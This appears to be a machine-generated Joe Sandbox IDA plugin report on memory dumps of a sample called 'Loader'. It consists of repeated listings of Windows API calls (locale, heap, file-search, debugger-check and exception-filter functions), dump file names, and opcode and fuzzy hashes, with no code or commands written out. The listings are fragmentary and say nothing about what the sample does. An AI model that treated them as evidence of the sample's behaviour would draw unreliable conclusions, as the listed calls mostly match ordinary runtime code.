• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• GetCPInfo.KERNEL32(00000083,?,00000005,00D476B8,?), ref: 00D47869
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-0
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• RtlAllocateHeap.NTDLL(00000000,00D47675,?,?,00D47675,00000220,?,?,?), ref: 00D45723
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,00D4AB6D,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B250
• GetLocaleInfoW.KERNEL32(?,20001004,00D4AB6D,00000002,00000000,?,?,?,00D4AB6D,?,00000000), ref: 00D4B279
• GetACP.KERNEL32(?,?,00D4AB6D,?,00000000), ref: 00D4B28E
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction ID: 12211e599adba2b564d31649dd473cea1bd023f344e81f659e69991d4562734d
                                                                                                  • Opcode Fuzzy Hash: 73fbb39909b10f7572f3357f9be20b62d0dd7cb0130b50acfa3fd77098ad2c1f
                                                                                                  • Instruction Fuzzy Hash: 3221B8227002009BDB348F65C981B9F77A6EF74B74B5E4526E949DB214E772DE40C374
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D4AB3F
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D4AB7D
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D4AB90
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D4ABD8
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D4ABF3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction ID: e26e11fe08b71ad3647ddab8a869fb332a512916b52f0625e03c7b66b26e2897
                                                                                                  • Opcode Fuzzy Hash: 5aa65f54b1953f985d331977e8eb3d5ae17fff187eac576dc34efcdd343f705f
                                                                                                  • Instruction Fuzzy Hash: 68516F71A40209AFDB10DFA9CC85ABE77B9EF14701F084569E941EB191E770DA44CB72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction ID: 9e6a83295ab796a3278f1d02f71d01fb70d87e40b0c787915c00f6039d8409a4
                                                                                                  • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                                  • Instruction Fuzzy Hash: D2020BB1E012199BDB14CFADD8806AEFBF1FF48314F298269E515E7341D731AA458BA0
                                                                                                  APIs
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4B889
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: 6cd2b267ba7cf7dc01e2ce351754df764c0259c9b1faa59d3ee63fc8a5ad8b7d
                                                                                                  • Instruction ID: 370eed927a723f1e11bfb7de3bd3d689faa5e42f8a84b9de4f7d89e9b45a2192
                                                                                                  • Opcode Fuzzy Hash: 6cd2b267ba7cf7dc01e2ce351754df764c0259c9b1faa59d3ee63fc8a5ad8b7d
                                                                                                  • Instruction Fuzzy Hash: C071D5719052686FDF24AF348C89ABABBB8EF55310F1841DAE449A7211DB31CE849F70
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D39A7F
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00D39B4B
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D39B64
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D39B6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction ID: 33e727686362e96c2399b76567f4c31698e8b41c058c68c9a0c3e1d6d1403421
                                                                                                  • Opcode Fuzzy Hash: 40baa707e00af431826123cbb8908d0f484746716394040289c985218bfbd293
                                                                                                  • Instruction Fuzzy Hash: 4631F775D053189BDB21EFA4D9497CDBBB8AF08300F1041EAE40CAB250EBB09B84CF55
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D3A347
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D3A356
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D3A35F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D3A36C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
                                                                                                  • Instruction ID: 8d89edd7c7494ecb4131dd961897051ae212997bc0e71d223859523e00d7eb9f
                                                                                                  • Opcode Fuzzy Hash: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
                                                                                                  • Instruction Fuzzy Hash: FDF05F74D1030DEBCB04EBB4DA8999EBBF4FF1C205B9149A5A812E7210E630AB449F61
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4AD84
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4ADCE
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4AE94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 661929714-0
                                                                                                  • Opcode ID: 26cd1b4c8c7c17cbb31f8cabd8586a6b312e1b28a95e9435ea0d71765f37a5d8
                                                                                                  • Instruction ID: 7c75437aed992f5ac394127a6778be1aed37a9993e010ba2dd02a5a6883db31f
                                                                                                  • Opcode Fuzzy Hash: 26cd1b4c8c7c17cbb31f8cabd8586a6b312e1b28a95e9435ea0d71765f37a5d8
                                                                                                  • Instruction Fuzzy Hash: 5261AFB16902079FDB289F28CD82BBAB7A8EF04310F18407AFD15C6285E774D985CB71
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D41B58
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D41B62
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D41B6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: cfe6a273611127a7f3c581ef00ef805d2941a0367d15b7096a4a23a8774b73b2
                                                                                                  • Instruction ID: a6cb5d650052283af251b4b3c4c8eb1cf83047a750e880f283c8b3f59fc95222
                                                                                                  • Opcode Fuzzy Hash: cfe6a273611127a7f3c581ef00ef805d2941a0367d15b7096a4a23a8774b73b2
                                                                                                  • Instruction Fuzzy Hash: 9E31B3B59013289BCB61DF68D8897CDBBB8FF08710F5042DAE81CA7251E7709B858F64
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D4E9E9,?,?,00000008,?,?,00D5539B,00000000), ref: 00D4ECBB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  • Opcode ID: 5f0014ebb5cbd7c76e6ce0d8dc12c6068a4f8a4eb18bce49dfd97206e8b4afca
                                                                                                  • Instruction ID: b7858acc9966fbf7e4d183e4eadd1efa74a83e7f87cd6fc2f4377595a677726c
                                                                                                  • Opcode Fuzzy Hash: 5f0014ebb5cbd7c76e6ce0d8dc12c6068a4f8a4eb18bce49dfd97206e8b4afca
                                                                                                  • Instruction Fuzzy Hash: 7CB14D31610609EFD719CF28C48AB657BE1FF45364F298658E8DACF2A1C335E991CB50
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D396F1
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 3bebe342846fcdf64453d551b27145fbf95d6021fd5f687140fff3bc5bea67ec
• Instruction ID: ee5be79dc8be2833e2e9d4563672b1336075fc01e92ab2bd99e66340d287a486
• Opcode Fuzzy Hash: 3bebe342846fcdf64453d551b27145fbf95d6021fd5f687140fff3bc5bea67ec
• Instruction Fuzzy Hash: 83A13DB591170A8FDB18DF54D8916AEBBF0FB48314F18956AD415E73A0D3B49940CFB0
APIs
  • Part of subcall function 00D469F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00D45B8F,00000001,00000364,00000002,000000FF,?,00000000,?,00D3D655,00000000,?), ref: 00D46A35
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4B889
• FindNextFileW.KERNEL32(00000000,?), ref: 00D4B97D
• FindClose.KERNEL32(00000000), ref: 00D4B9BC
• FindClose.KERNEL32(00000000), ref: 00D4B9EF
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: Find$CloseFile$AllocFirstHeapNext
• String ID:
• API String ID: 2701053895-0
• Opcode ID: f387d84d7a9ec86aaea4f0a639a71f9dba147b87746009917f0447097ab57559
• Instruction ID: ad8f6f05c7818d28e15467f68b9bf511e2951fa71338b1ac802c14385dc9c3c3
• Opcode Fuzzy Hash: f387d84d7a9ec86aaea4f0a639a71f9dba147b87746009917f0447097ab57559
• Instruction Fuzzy Hash: 8F513675900218AFDF24AF389C85ABE7BB9DFA5364F18419AF85997201EB30CD419F70
APIs
  • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
  • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4B044
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 2be5c73d20df5bf199dda6c9879ad718a39f80ff111444cc843a6393698c1428
• Instruction ID: be16343ccb7e590cb0da67d047e0b813fb8f6ff3824faed5c9dc85ca225dfb66
• Opcode Fuzzy Hash: 2be5c73d20df5bf199dda6c9879ad718a39f80ff111444cc843a6393698c1428
• Instruction Fuzzy Hash: B0219272605206ABDF289B29DC41ABB77A8EF66321F14407BFD12D6181EB74ED418B70
Strings
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 4b3882e634a5442974cb9b846ff82eefb9518c74b14400d0af67807947fd5364
• Instruction ID: b9d1aa2e606c1a3a60631aaf88d4e91d43911770a5b69b2102790a56078a3607
• Opcode Fuzzy Hash: 4b3882e634a5442974cb9b846ff82eefb9518c74b14400d0af67807947fd5364
• Instruction Fuzzy Hash: 95B1B37090464A8FCB288F68E5956BEBBB2EF15300F180619E5D3AB6D1D771EA01CF71
APIs
  • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
  • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D4B164
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 65ae06ca0b3bd322f75e0e969d1b5238b9ca66e176e4b591f4ce96a02abc06ee
• Instruction ID: f6480661ab778559c7210745977f714bc6bcbfd29dfbaf210259a86563bdf9ed
• Opcode Fuzzy Hash: 65ae06ca0b3bd322f75e0e969d1b5238b9ca66e176e4b591f4ce96a02abc06ee
• Instruction Fuzzy Hash: 8B11C272611306ABDB14AF29DC56ABA77E8EF15320B14417AE906D7241EB78ED018B70
APIs
  • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
  • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
• EnumSystemLocalesW.KERNEL32(00D4AD30,00000001,00000000,?,-00000050,?,00D4AB13,00000000,-00000002,00000000,?,00000055,?), ref: 00D4ACFA
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 8751ed8ffaf42a2c1bbe29d99b7574940630af5d2d58e9fd987aaa8bb42503b8
• Instruction ID: 1928d2861da8716b088381b29b010d18b2085ffd9e644d281804c5786e0f066b
• Opcode Fuzzy Hash: 8751ed8ffaf42a2c1bbe29d99b7574940630af5d2d58e9fd987aaa8bb42503b8
• Instruction Fuzzy Hash: 2611E93A6007015FDB189F39C8916BAB791FF80369B19442DE98687B40E771B942CB60
APIs
  • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
  • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D4AF4C,00000000,00000000,?), ref: 00D4B2E9
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 9df831a63d0051c9c0a8434a04f2f6a6c1d07f876ff4fb950096463bc5fad4f4
• Instruction ID: 01a96d9fee1a94dbefd609da19be60532a5fa90d57b70a02ce121a0bd41d72ad
• Opcode Fuzzy Hash: 9df831a63d0051c9c0a8434a04f2f6a6c1d07f876ff4fb950096463bc5fad4f4
• Instruction Fuzzy Hash: 2101FE36610112EBDB1C5F269C0A6FA7794EB50774F59442AEC46E3180DB30FE41C5B0
APIs
  • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
  • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
• EnumSystemLocalesW.KERNEL32(00D4AFF0,00000001,?,?,-00000050,?,00D4AADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D4AFCD
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 1a2f2ae568c761bdaa3090879c6f3447a65a70d6730e6313f8c539c8e10b10a7
• Instruction ID: 2c7c9ed2ab842c2d60b92bdc0784efddf2595fe35950317e8081e05edf7958aa
• Opcode Fuzzy Hash: 1a2f2ae568c761bdaa3090879c6f3447a65a70d6730e6313f8c539c8e10b10a7
• Instruction Fuzzy Hash: D9F0F6762003045FDB256F39D881A7A7BD5EF80368B19442DF9468B680D6719C46CA71
APIs
  • Part of subcall function 00D41D11: EnterCriticalSection.KERNEL32(?,?,00D45DD8,?,00D5FC38,00000008,00D45CCA,00000000,00000000,?), ref: 00D41D20
• EnumSystemLocalesW.KERNEL32(00D468F0,00000001,00D5FCB8,0000000C,00D462F1,-00000050), ref: 00D46935
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 643fcb8395777fcc4f6f8791f3481d00b4b1d2e60f087ea66d0ddac7aade440d
• Instruction ID: a590a609e5af0b7504a735d9158b690faea747e8f90e0679773f056ffe661df2
• Opcode Fuzzy Hash: 643fcb8395777fcc4f6f8791f3481d00b4b1d2e60f087ea66d0ddac7aade440d
• Instruction Fuzzy Hash: 0AF0C976A003049FD704DFA8E842B9977A0EB49721F10412AE911DB3A1C7B599448F75
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4594A: GetLastError.KERNEL32(00000000,?,00D47CCD), ref: 00D4594E
                                                                                                    • Part of subcall function 00D4594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D41F93), ref: 00D459F0
                                                                                                  • EnumSystemLocalesW.KERNEL32(00D4B110,00000001,?,?,?,00D4AB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D4B0FC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
